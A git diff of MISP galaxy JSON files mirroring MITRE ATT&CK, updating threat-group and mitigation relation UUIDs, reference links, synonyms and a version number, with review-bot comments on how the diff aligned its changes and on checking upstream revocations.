"tags": [
@@ -16294,7 +13014,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586",
+ "dest-uuid": "438c967d-3996-4870-bfc2-3954752a1927",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -16315,7 +13035,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
+ "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -16342,13 +13062,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "573ad264-1371-4ae0-8482-d2673b719dba",
"tags": [
@@ -16377,13 +13090,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b",
"tags": [
@@ -16490,7 +13196,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "8faedf87-dceb-4c35-b2a2-7286f59a3bc3",
+ "dest-uuid": "90c4a591-d02d-490b-92aa-619d9701ac04",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -16503,6 +13209,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "9664ad0e-789e-40ac-82e2-d7b17fbe8fb3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd",
"tags": [
@@ -16539,7 +13252,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09",
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -16559,13 +13272,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "bf96a5a3-3bce-43b7-8597-88545984c07b",
"tags": [
@@ -16573,20 +13279,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c4ad009b-6e13-4419-8d21-918a1652de02",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
"tags": [
@@ -16683,5 +13375,5 @@
"value": "Audit - M1047"
}
],
- "version": 25
+ "version": 26
}
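Review bot: The version bump to 26 is present, which MISP uses to detect that the cluster changed, but given the volume of relation removals above it should land together with a statement of what the cluster was regenerated from (the MITRE CTI bundle version or commit). Without that, a consumer comparing versions 25 and 26 cannot distinguish a deliberate re-sync from a generator regression.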
diff --git a/clusters/mitre-intrusion-set.json b/clusters/mitre-intrusion-set.json
index 50e43f1..da49cea 100644
--- a/clusters/mitre-intrusion-set.json
+++ b/clusters/mitre-intrusion-set.json
@@ -395,6 +395,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "40f5caa0-4cb7-4117-89fc-d421bb493df3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "41868330-6ee2-4d0f-b743-9f2294c3c9b6",
"tags": [
@@ -752,6 +759,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "e7cbc1de-1f79-48ee-abfd-da1241c65a15",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0",
"tags": [
@@ -1449,13 +1463,13 @@
"https://blog.morphisec.com/cobalt-gang-2.0",
"https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html",
"https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report",
+ "https://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/",
+ "https://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/",
"https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain",
"https://www.group-ib.com/blog/cobalt",
"https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target",
"https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf",
"https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf",
- "https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/",
- "https://www.riskiq.com/blog/labs/cobalt-strike/",
"https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish"
],
"synonyms": [
@@ -1613,13 +1627,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"tags": [
@@ -1669,6 +1676,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -2224,13 +2238,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47",
"tags": [
@@ -2273,6 +2280,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -2515,6 +2529,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "deb98323-e13f-4b0c-8d94-175379069062",
"tags": [
@@ -3750,11 +3771,11 @@
"meta": {
"external_id": "G0032",
"refs": [
- "https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/",
"https://attack.mitre.org/groups/G0032",
"https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/",
"https://home.treasury.gov/news/press-releases/sm774",
"https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf",
+ "https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/",
"https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing",
"https://www.us-cert.gov/ncas/alerts/TA17-164A",
"https://www.us-cert.gov/ncas/analysis-reports/AR19-100A"
@@ -3818,13 +3839,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "0715560d-4299-4e84-9e20-6e80ab57e4f2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"tags": [
@@ -3909,13 +3923,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
"tags": [
@@ -3944,13 +3951,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "29be378d-262d-4e99-b00d-852d573628e6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "2b742742-28c3-4e1b-bab7-8350d6300fa7",
"tags": [
@@ -4028,13 +4028,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "3ee16395-03f0-4690-a32e-69ce9ada0f9e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "3ffbdc1f-d2bf-41ab-91a2-c7b857e98079",
"tags": [
@@ -4056,13 +4049,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "454fe82d-6fd2-4ac6-91ab-28a33fe01369",
"tags": [
@@ -4119,13 +4105,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "506f6f49-7045-4156-9007-7474cb44ad6d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b",
"tags": [
@@ -4147,13 +4126,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "60c4b628-4807-4b0b-bbf5-fdac8643c337",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "65013dd2-bc61-43e3-afb5-a14c4fa7437a",
"tags": [
@@ -4315,13 +4287,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "9b325b06-35a1-457d-be46-a4ecc0b7ff0c",
"tags": [
@@ -4336,13 +4301,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "9e7452df-5144-4b6e-b04a-b66dd4016747",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
"tags": [
@@ -4385,13 +4343,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "aad11e34-02ca-4220-91cd-2ed420af4db3",
"tags": [
@@ -4434,20 +4385,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "bbe5b322-e2af-4a5e-9625-a4e62bf84ed3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bd0536d7-b081-43ae-a773-cfb057c5b988",
"tags": [
@@ -4476,13 +4413,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "c11ac61d-50f4-444f-85d8-6f006067f0de",
"tags": [
@@ -4490,13 +4420,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c1b68a96-3c48-49ea-a6c0-9b27359f9c19",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "c325b232-d5bc-4dde-a3ec-71f3db9e8adc",
"tags": [
@@ -4511,20 +4434,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "cc723aff-ec88-40e3-a224-5af9fd983cc4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -4553,20 +4462,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "deb98323-e13f-4b0c-8d94-175379069062",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
"tags": [
@@ -4616,13 +4511,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "e7cbc1de-1f79-48ee-abfd-da1241c65a15",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "e928333f-f3df-4039-9b8b-556c2add0e42",
"tags": [
@@ -4644,13 +4532,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d",
"tags": [
@@ -4658,13 +4539,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433",
"tags": [
@@ -4707,13 +4581,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f9cc4d06-775f-4ee1-b401-4e2cc0da30ba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "fb640c43-aa6b-431e-a961-a279010424ac",
"tags": [
@@ -4983,6 +4850,7 @@
"https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/",
"https://www.justice.gov/opa/page/file/1098481/download",
"https://www.justice.gov/opa/press-release/file/1328521/download",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/",
"https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory",
"https://www.secureworks.com/research/threat-profiles/iron-viking"
],
@@ -4993,7 +4861,8 @@
"IRON VIKING",
"BlackEnergy (Group)",
"Quedagh",
- "Voodoo Bear"
+ "Voodoo Bear",
+ "IRIDIUM"
]
},
"related": [
@@ -5088,6 +4957,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "1da748a5-875d-4212-9222-b4c23ab861be",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
"tags": [
@@ -5109,6 +4985,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "26c87906-d750-42c5-946c-d4162c73fc7b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "2b5aa86b-a0df-4382-848d-30abea443327",
"tags": [
@@ -5214,13 +5097,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541",
"tags": [
@@ -5284,13 +5160,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "692074ae-bb62-4a5e-a735-02cb6bde458c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "69f897fd-12a9-4c89-ad6a-46d2f3c38262",
"tags": [
@@ -5299,14 +5168,14 @@
"type": "uses"
},
{
- "dest-uuid": "6ee2dc99-91ad-4534-a7d8-a649358c331f",
+ "dest-uuid": "6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "dest-uuid": "6ee2dc99-91ad-4534-a7d8-a649358c331f",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
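Review bot: the two `-`/`+` pairs in this hunk are not in-place edits of existing relations; because `related` is sorted by `dest-uuid`, the diff has aligned the insertion of `6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5` and the removal of `707399d6-ab3e-4963-9315-d9d3818cd6a0` against the unchanged `6ee2dc99-...` entry. Review the dropped `707399d6-...` relation explicitly, since it never appears as a standalone `-` block the way the other removals in this file do. The same alignment artefact recurs at @@ -5516, @@ -6666 and @@ -7482.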
@@ -5354,6 +5223,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "92a78814-b191-47ca-909c-1ccfe3777414",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
"tags": [
@@ -5389,13 +5265,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0",
"tags": [
@@ -5452,6 +5321,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "baf60e1a-afe5-4d31-830f-1b1ba2351884",
"tags": [
@@ -5501,13 +5377,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
"tags": [
@@ -5516,14 +5385,14 @@
"type": "uses"
},
{
- "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "deb98323-e13f-4b0c-8d94-175379069062",
+ "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -5543,13 +5412,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "e221eb77-1502-4129-af1d-fe1ad55e7ec6",
"tags": [
@@ -5585,6 +5447,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9",
"tags": [
@@ -5599,13 +5468,6 @@
],
"type": "similar"
},
- {
- "dest-uuid": "f9e9365a-9ca2-4d9c-8e7c-050d73d1101a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
"tags": [
@@ -5758,12 +5620,12 @@
"meta": {
"external_id": "G0044",
"refs": [
- "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf",
"http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates",
"https://401trg.github.io/pages/burning-umbrella.html",
"https://attack.mitre.org/groups/G0044",
"https://securelist.com/games-are-over/70991/",
- "https://securelist.com/winnti-more-than-just-a-game/37029/"
+ "https://securelist.com/winnti-more-than-just-a-game/37029/",
+ "https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf"
],
"synonyms": [
"Winnti Group",
@@ -6193,6 +6055,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d52291b4-bb23-45a8-aef0-3dc7e986ba15",
"tags": [
@@ -6329,6 +6198,20 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "0dda99f0-4701-48ca-9774-8504922e92d3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "132d5b37-aac5-4378-a8dc-3127b18a73dc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f",
"tags": [
@@ -6357,6 +6240,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "26c87906-d750-42c5-946c-d4162c73fc7b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11",
"tags": [
@@ -6434,6 +6324,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "40f5caa0-4cb7-4117-89fc-d421bb493df3",
"tags": [
@@ -6455,6 +6352,20 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "5282dd9a-d26d-4e16-88b7-7c0f4553daf4",
"tags": [
@@ -6497,6 +6408,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "6151cbea-819b-455a-9fa6-99a1cc58797d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "635cbe30-392d-4e27-978e-66774357c762",
"tags": [
@@ -6532,6 +6450,20 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "7acb15b6-fe2c-4319-b136-6ab36ff0b2d4",
"tags": [
@@ -6546,6 +6478,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475",
"tags": [
@@ -6553,6 +6492,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "86724806-7ec9-4a48-a0a7-ecbde3bf4810",
"tags": [
@@ -6595,6 +6541,13 @@
],
"type": "similar"
},
+ {
+ "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0",
"tags": [
@@ -6644,6 +6597,27 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "b77b563c-34bb-4fb8-86a3-3694338f7b47",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "ba724df5-9aa0-45ca-8e0e-7101c208ae48",
"tags": [
@@ -6651,6 +6625,13 @@
],
"type": "similar"
},
+ {
+ "dest-uuid": "baf60e1a-afe5-4d31-830f-1b1ba2351884",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "bc76d0a4-db11-4551-9ac4-01a469cfb161",
"tags": [
@@ -6666,7 +6647,14 @@
"type": "uses"
},
{
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
+ "dest-uuid": "bf90d72c-c00b-45e3-b3aa-68560560d4c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
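Review bot: `c848fcf7-6b62-4bde-8216-b6c157d48da0` is replaced here by `bf90d72c-c00b-45e3-b3aa-68560560d4c5` plus a new `c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f`, and the same `c848fcf7-...` relation is deleted outright, with no replacement, from other entries at @@ -4511, @@ -7014, @@ -9567 and @@ -11799. A `dest-uuid` vanishing from every group that referenced it is the signature of a technique being revoked or deprecated upstream; confirm that the corresponding object in the attack-pattern cluster now carries a `revoked-by` relation (or is marked deprecated), otherwise these groups silently lose a technique mapping.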
@@ -6693,6 +6681,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d56c99fa-4710-472c-81a6-41b7a84ea4be",
"tags": [
@@ -6728,6 +6723,20 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e48df773-7c95-4a4c-ba70-ea3d15900148",
"tags": [
@@ -6756,6 +6765,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "ed730f20-0e44-48b9-85f8-0e2adeb76867",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9",
"tags": [
@@ -6815,89 +6831,12 @@
]
},
"related": [
- {
- "dest-uuid": "09a60ea3-a8d1-4ae5-976e-5783248b72a4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "0ec2f388-bf0f-4b5c-97b1-fc736d26c25f",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "revoked-by"
- },
- {
- "dest-uuid": "2b742742-28c3-4e1b-bab7-8350d6300fa7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
